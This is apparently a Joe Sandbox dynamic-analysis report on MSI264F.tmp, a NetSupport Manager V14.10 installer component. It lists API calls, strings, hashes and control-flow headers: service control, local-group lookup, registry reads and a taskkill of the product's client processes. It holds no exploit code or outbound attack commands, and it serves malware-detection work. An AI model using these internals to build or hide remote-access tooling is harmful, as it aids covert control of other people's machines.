                                                                                                                        • SetThreadPriority.KERNELBASE(00000000,00000002), ref: 00B1A46D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Create$Event$wsprintf$DescriptorErrorLastLocalSecurityThread$AllocCloseCurrentDaclFileFreeHandleInitializeModuleNamePriorityProcess_wcschr
                                                                                                                        • String ID: %s.dmp.%05d$%s.dmp.%d$%s.maxidmp.%d$?????????
                                                                                                                        • API String ID: 2294567594-4071914627
                                                                                                                        • Opcode ID: 691e0e7c403dab505090621cc4e7e03aa52371b5cc750d8eaa6db0c17f3f78a7
                                                                                                                        • Instruction ID: 254d9326bb21581f2dbbaf18d6e001cccbf1f6a5f77238178e42443487e5f5c6
                                                                                                                        • Opcode Fuzzy Hash: 691e0e7c403dab505090621cc4e7e03aa52371b5cc750d8eaa6db0c17f3f78a7
                                                                                                                        • Instruction Fuzzy Hash: 665195B1A40314EBE720ABA0DC8AFD977ACEB44B00F504595F705A72D1DBF46984CF99

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • __wcsnicmp.LIBCMT ref: 00B2F2DF
                                                                                                                        • GetKeyState.USER32(00000011), ref: 00B2F33D
                                                                                                                        • GetKeyState.USER32(00000010), ref: 00B2F346
                                                                                                                        • wsprintfW.USER32 ref: 00B2F3A2
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 00B2F3C5
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: State$Open__wcsnicmpwsprintf
                                                                                                                        • String ID: @$Log$Log=$SOFTWARE\Productive Computer Insight\%s$winst32$winst32.log$winstall
                                                                                                                        • API String ID: 1795747328-2723375655
                                                                                                                        • Opcode ID: 9c635f39739aacb170f7c02653e91af243e5cb9ac61a2390e43665ddcc082551
                                                                                                                        • Instruction ID: eb4bca6677499fcf18de7f927151a033c642230b279b5f549d80d92105b07cb3
                                                                                                                        • Opcode Fuzzy Hash: 9c635f39739aacb170f7c02653e91af243e5cb9ac61a2390e43665ddcc082551
                                                                                                                        • Instruction Fuzzy Hash: 7F4185B19002169BCF24EB50EC92BFA73F4EB54704F1440F9E60DA7191EBB45A89CB96

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetVersionExW.KERNEL32(?,74DF0900,?,00000000), ref: 00B2F6F7
                                                                                                                        • LoadLibraryW.KERNEL32(kernel32.dll), ref: 00B2F7A6
                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00B2F7BE
                                                                                                                        • GetCurrentProcess.KERNEL32(00B92534), ref: 00B2F7CB
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00B2F7EB
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00B2F805
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B2F80C
                                                                                                                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00B2F819
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProc$CurrentFreeHandleInfoLoadModuleNativeProcessSystemVersion
                                                                                                                        • String ID: GetNativeSystemInfo$GetNativeSystemInfo missing$IsWow64Process$cpu is x64, setting wow64=TRUE$cpu type is %d, probably not x64$iswow64process, setting wow64=TRUE$kernel32.dll
                                                                                                                        • API String ID: 3154316710-1749150432
                                                                                                                        • Opcode ID: ec6e8e0b1570af77135d9135a449fcf538eaef42d97ca78dce3989c08334b5e2
                                                                                                                        • Instruction ID: d0c8b979996ecc689b19bb20c7939406d23ee523c3f0e3c08c8d977c4e18760b
                                                                                                                        • Opcode Fuzzy Hash: ec6e8e0b1570af77135d9135a449fcf538eaef42d97ca78dce3989c08334b5e2
                                                                                                                        • Instruction Fuzzy Hash: 1B412771D00226ABDB149F64BD859BD72F4EB94701F2100FAE41E97270DEB44D818F85

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • LoadLibraryW.KERNELBASE(NETAPI32), ref: 00B254C8
                                                                                                                        • GetProcAddress.KERNELBASE(00000000,NetUserGetLocalGroups), ref: 00B254E5
                                                                                                                        • GetProcAddress.KERNELBASE(00000000,NetApiBufferFree), ref: 00B254F7
                                                                                                                        • GetUserNameW.ADVAPI32(?,00000050), ref: 00B25515
                                                                                                                        • FreeLibrary.KERNELBASE(00000000), ref: 00B255AB
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryProcwsprintf$FreeLoadLocalNameTimeUser_mallocwvsprintf
                                                                                                                        • String ID: Member of Local Group: %ls$NETAPI32$NetApiBufferFree$NetUserGetLocalGroups$P$e:\nsmsrc\nsm\1410\1410\nt\winst32.c$pTmpBuf != NULL
                                                                                                                        • API String ID: 3527361283-593064418
                                                                                                                        • Opcode ID: 576bcc1bfe8a473f8e4bf9d80280bb99b11953cd47dc9db69ee16c1daf78c72a
                                                                                                                        • Instruction ID: eea2b7c7b5773536aefaaae8cbb9be06f84072b1c5340d14f74f1120ad4cc7a7
                                                                                                                        • Opcode Fuzzy Hash: 576bcc1bfe8a473f8e4bf9d80280bb99b11953cd47dc9db69ee16c1daf78c72a
                                                                                                                        • Instruction Fuzzy Hash: 7931AF71E01738ABDB309B549C45BAEB7B9EF54B00F0141DAF94D63290DBB09E848F92

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B2D74F
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                          • Part of subcall function 00B29630: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,5E06C67B), ref: 00B2967A
                                                                                                                          • Part of subcall function 00B29630: GetLastError.KERNEL32 ref: 00B296BB
                                                                                                                          • Part of subcall function 00B29630: OpenServiceW.ADVAPI32(00000000,00000000,00000034), ref: 00B296DD
                                                                                                                          • Part of subcall function 00B29630: GetLastError.KERNEL32 ref: 00B296E5
                                                                                                                          • Part of subcall function 00B29630: QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B2970C
                                                                                                                        • FindWindowW.USER32(?,?), ref: 00B2D7DD
                                                                                                                        • EnumWindows.USER32(Function_000450A0,00000000), ref: 00B2D7FB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastOpenServicewsprintf$EnumFindLocalManagerQueryStatusTimeWindowWindows_malloc_memsetwvsprintf
                                                                                                                        • String ID: $%s %s (%x)...$...Error or timeout, e=%d$...OK$/EC$/ec$Back from Install$C:\Windows\Installer\$CICPLUGIN$CICPLUGIN [loggedonuser]$CICWClass$CloseApps32, prod=%d$Closing$Command Line: %s$Created main window %08x$Done:$Exit$Install Failed$NSM$NSMWClass$NSMWControl32$NSSWControl32$NetSupport Manager for Windows (32 bit) V14.10$OK$P$PCD$PCIAX.DLL$PCIRUNPLUGIN [loggedonuser]$PCIRemoteInstall$PCIVideoPlayer32$Quitting$Quitting %s (%x)...$Restart$Skipping rollback$Start, session=%d, user=%s$Undoing Install$V14.10$V15.10$boot$display.drv$enum msg wnd$enum msg wnd %x failed, e=%d$imhook.dll$module=%s$nslsp.dll$pciappctrl.dll$pciapp~1.dll$pcihooks.dll$shellscr.drv$system.ini$ver=%s$winexec.ok

                                                                                                                        APIs
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00000044,?,?,?,?,?,?,00000000), ref: 00B29972
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00001388,?,?,?,?,?,00000000,00000000), ref: 00B29988
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B2999B
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00B299A4
                                                                                                                        • ControlService.ADVAPI32(00000000,00000001,?), ref: 00B29A48
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29A5C
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B29A7A
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29B49
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B29B7A
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29B88
                                                                                                                        • StartServiceW.ADVAPI32(00000000,00000000,00000000), ref: 00B29BB5
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29BDA
                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 00B29BF1
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29BFF
                                                                                                                        • RegisterEventSourceW.ADVAPI32(00000000,PCIapp), ref: 00B29C4D
                                                                                                                        • GetComputerNameW.KERNEL32(?,?), ref: 00B29C75
                                                                                                                        • wsprintfW.USER32 ref: 00B29C97
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B29D22
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B29D3C
                                                                                                                        • Sleep.KERNELBASE(000001F4), ref: 00B29D47
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000E0), ref: 00B29D7B
                                                                                                                        • QueryServiceStatus.ADVAPI32(00000000,?), ref: 00B29A88
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                          • Part of subcall function 00AE3DA0: _free.LIBCMT ref: 00AE3DC2
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$QueryStatus$CloseHandleSleep$wsprintf$ComputerControlCreateDirectoryEventLocalNameObjectProcessRegisterSingleSourceStartSystemTimeWait_free_mallocwvsprintf
                                                                                                                        • String ID: AllowStop ret %x$Attempt to start the service$CICWClass$Calling %s$NSMWClass$PCIapp$Restarted client32 service after %s$Service is stopped$Service started ok$Service stopped ok$StartService ok$Use old method$Waiting a while until stopped$\net$\taskkill.exe /F /IM client32.exe /IM runplugin.exe /IM runplugin64.exe$client32 control finished$close service$close service manager$crash$done taskkill$start
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,73AD1CB0,0000001A,?), ref: 00B26F2C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: FileModuleName
                                                                                                                        • String ID: ??F$??I$AssistantName$AssistantURL$Home$LongName$NSMAppDataDir$NSSAppDataDir$NSSConfName$NSSLongCaption$NSSName$NSSTLA$Name$ShortName$SupportEMail$SupportWWW$SupportsAndroid$SupportsChrome$TLA$TechConsole$\$product.dat

                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B29F2C
                                                                                                                        • _memset.LIBCMT ref: 00B29F44
                                                                                                                        • _memset.LIBCMT ref: 00B29F79
                                                                                                                          • Part of subcall function 00B22110: _fseek.LIBCMT ref: 00B22123
                                                                                                                          • Part of subcall function 00B22110: _fseek.LIBCMT ref: 00B22133
                                                                                                                          • Part of subcall function 00B22110: _malloc.LIBCMT ref: 00B22143
                                                                                                                          • Part of subcall function 00B22110: __fread_nolock.LIBCMT ref: 00B22156
                                                                                                                          • Part of subcall function 00B22110: _free.LIBCMT ref: 00B221A1
                                                                                                                          • Part of subcall function 00B22110: _fseek.LIBCMT ref: 00B221AB
                                                                                                                        • _wcschr.LIBCMT ref: 00B2A140
                                                                                                                        • _wcschr.LIBCMT ref: 00B2A2B2
                                                                                                                        • _wcschr.LIBCMT ref: 00B2A2C3
                                                                                                                        • _memset.LIBCMT ref: 00B2A2F3
                                                                                                                        • _memset.LIBCMT ref: 00B2A30C
                                                                                                                        • _memmove.LIBCMT ref: 00B2A322
                                                                                                                        • _memmove.LIBCMT ref: 00B2A33D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _memset$_fseek_wcschr$_memmove$__fread_nolock_free_malloc
                                                                                                                        • String ID: Enforce$_License$api$control_only$d$expiry$free_loader$inactive$licensee$maxslaves$os2$product$quiet$serial_no$shrink_wrap$start$transport
                                                                                                                        • API String ID: 4252023336-3044997468
                                                                                                                        • Opcode ID: 11cc3d7293f86dc6178478f89b30ce66c776c0d919dddaf97d1ad863b8133bee
                                                                                                                        • Instruction ID: 56bf4f3c20b4f9f3794e60e4a066fd79a306fafdd15c2ff9c9d1e5b3a93e5b99
                                                                                                                        • Opcode Fuzzy Hash: 11cc3d7293f86dc6178478f89b30ce66c776c0d919dddaf97d1ad863b8133bee
                                                                                                                        • Instruction Fuzzy Hash: 2F02D6B6D002215BDF20AA64AC46BAB73E8DF55701F0445E5FC0DA7252EE74DE44CBA3

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetPrivateProfileStringW.KERNEL32(boot,display.drv,00B6A054,00B90F98,00000400,system.ini), ref: 00B2E0A5
                                                                                                                        • lstrcmpiW.KERNEL32(00B90F98,shellscr.drv), ref: 00B2E0B5
                                                                                                                        • GetModuleFileNameW.KERNEL32(00AE0000,?,00000100), ref: 00B2E0F0
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2E0F6
                                                                                                                        • _wcschr.LIBCMT ref: 00B2E1F3
                                                                                                                        • _wcschr.LIBCMT ref: 00B2E216
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr$ErrorFileLastModuleNamePrivateProfileStringlstrcmpi
                                                                                                                        • String ID: NetSupport Manager for Windows (32 bit) V14.10$V14.10$V15.10$boot$display.drv$module=%s$shellscr.drv$system.ini$ver=%s$winexec.ok
                                                                                                                        • API String ID: 127461356-4233989162
                                                                                                                        • Opcode ID: 32aebebb35e1daa7f9f46bad21f0a74572dc6da022cb7724e2532a08d6b2e368
                                                                                                                        • Instruction ID: 3690380a292130ea8c4730619f2ba84f292489088cf0e6c15f030768a0ac6689
                                                                                                                        • Opcode Fuzzy Hash: 32aebebb35e1daa7f9f46bad21f0a74572dc6da022cb7724e2532a08d6b2e368
                                                                                                                        • Instruction Fuzzy Hash: 0B5169729402218BCB30AB29AC56A6A73F1EB44310F1546E5E42E973F1FF70C841C762

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • GetShortPathNameW.KERNELBASE(?,00B8C848,00000100), ref: 00B260A5
                                                                                                                        • GetLastError.KERNEL32 ref: 00B260AF
                                                                                                                          • Part of subcall function 00B25690: GetModuleHandleW.KERNEL32(kernel32,GetLongPathNameW), ref: 00B256E4
                                                                                                                          • Part of subcall function 00B25690: GetProcAddress.KERNEL32(00000000), ref: 00B256EB
                                                                                                                          • Part of subcall function 00B25690: GetLongPathNameW.KERNELBASE(?,?,00000104), ref: 00B256FC
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • wsprintfW.USER32 ref: 00B2610B
                                                                                                                        • MessageBoxW.USER32(00000000,?,NetSupport Manager for Windows (32 bit) V14.10,00000000), ref: 00B26124
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(C:\Windows\Installer\), ref: 00B26230
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$NamePath$AddressCurrentDirectoryErrorHandleLastLocalLongMessageModuleProcShortTime_mallocwvsprintf
                                                                                                                        • String ID: C:\Windows\Installer\$Fatal Error, cannot continuemodule=<%s>, e1=%d, path=<%s>, e2=%d$IKS.LIC$NST.LIC$NSW.LIC$NetSupport Manager for Windows (32 bit) V14.10$longpath=%s$path=%s
                                                                                                                        • API String ID: 3910602105-2982756972
                                                                                                                        • Opcode ID: b05b4fdc412ddfe4c762544d41f98a085bd38adb063e14e2f1ff28aa6fb324d1
                                                                                                                        • Instruction ID: d49e070717dae847ff6cb8799ae611fcfd4c7d7b0a6ebba7f5fbd01f2b782087
                                                                                                                        • Opcode Fuzzy Hash: b05b4fdc412ddfe4c762544d41f98a085bd38adb063e14e2f1ff28aa6fb324d1
                                                                                                                        • Instruction Fuzzy Hash: B4712071A80325EACB20AB6CAD27B7637E0EF54751F1404E5F80ADB2B2FB749901C365

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                        • wsprintfW.USER32 ref: 00B2F3A2
                                                                                                                        • RegOpenKeyExW.KERNELBASE(80000002,?,00000000,00020019,00000000), ref: 00B2F3C5
                                                                                                                        • RegQueryValueExW.ADVAPI32(00000000,Log,00000000,?,?,?), ref: 00B2F3F5
                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 00B2F413
                                                                                                                        • LeaveCriticalSection.KERNEL32(00B9250C), ref: 00B2F428
                                                                                                                        • _fputs.LIBCMT ref: 00B2F4A7
                                                                                                                        • _free.LIBCMT ref: 00B2F4F9
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseCriticalLeaveOpenQuerySectionValue_fputs_freewsprintf
                                                                                                                        • String ID: @$Log$SOFTWARE\Productive Computer Insight\%s$winst32$winstall
                                                                                                                        • API String ID: 1741332052-2172721721
                                                                                                                        • Opcode ID: b3fa742350b3e463f8a9c64f28193597a89cd569c5e7e0a8af900b5288cab9a8
                                                                                                                        • Instruction ID: 8f57c03ee9ca4319da563775e17535c5053d289f11e4092ed842ba2f4eff7717
                                                                                                                        • Opcode Fuzzy Hash: b3fa742350b3e463f8a9c64f28193597a89cd569c5e7e0a8af900b5288cab9a8
                                                                                                                        • Instruction Fuzzy Hash: 0B1163B2D00218ABDB24DB54EC95BEE73F8EB44704F1041E9E50D97181DBB55A84CF95

                                                                                                                        Control-flow Graph

                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B15120: GetCurrentProcess.KERNEL32 ref: 00B1513C
                                                                                                                          • Part of subcall function 00B15120: GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI264F.tmp,00000104), ref: 00B1515A
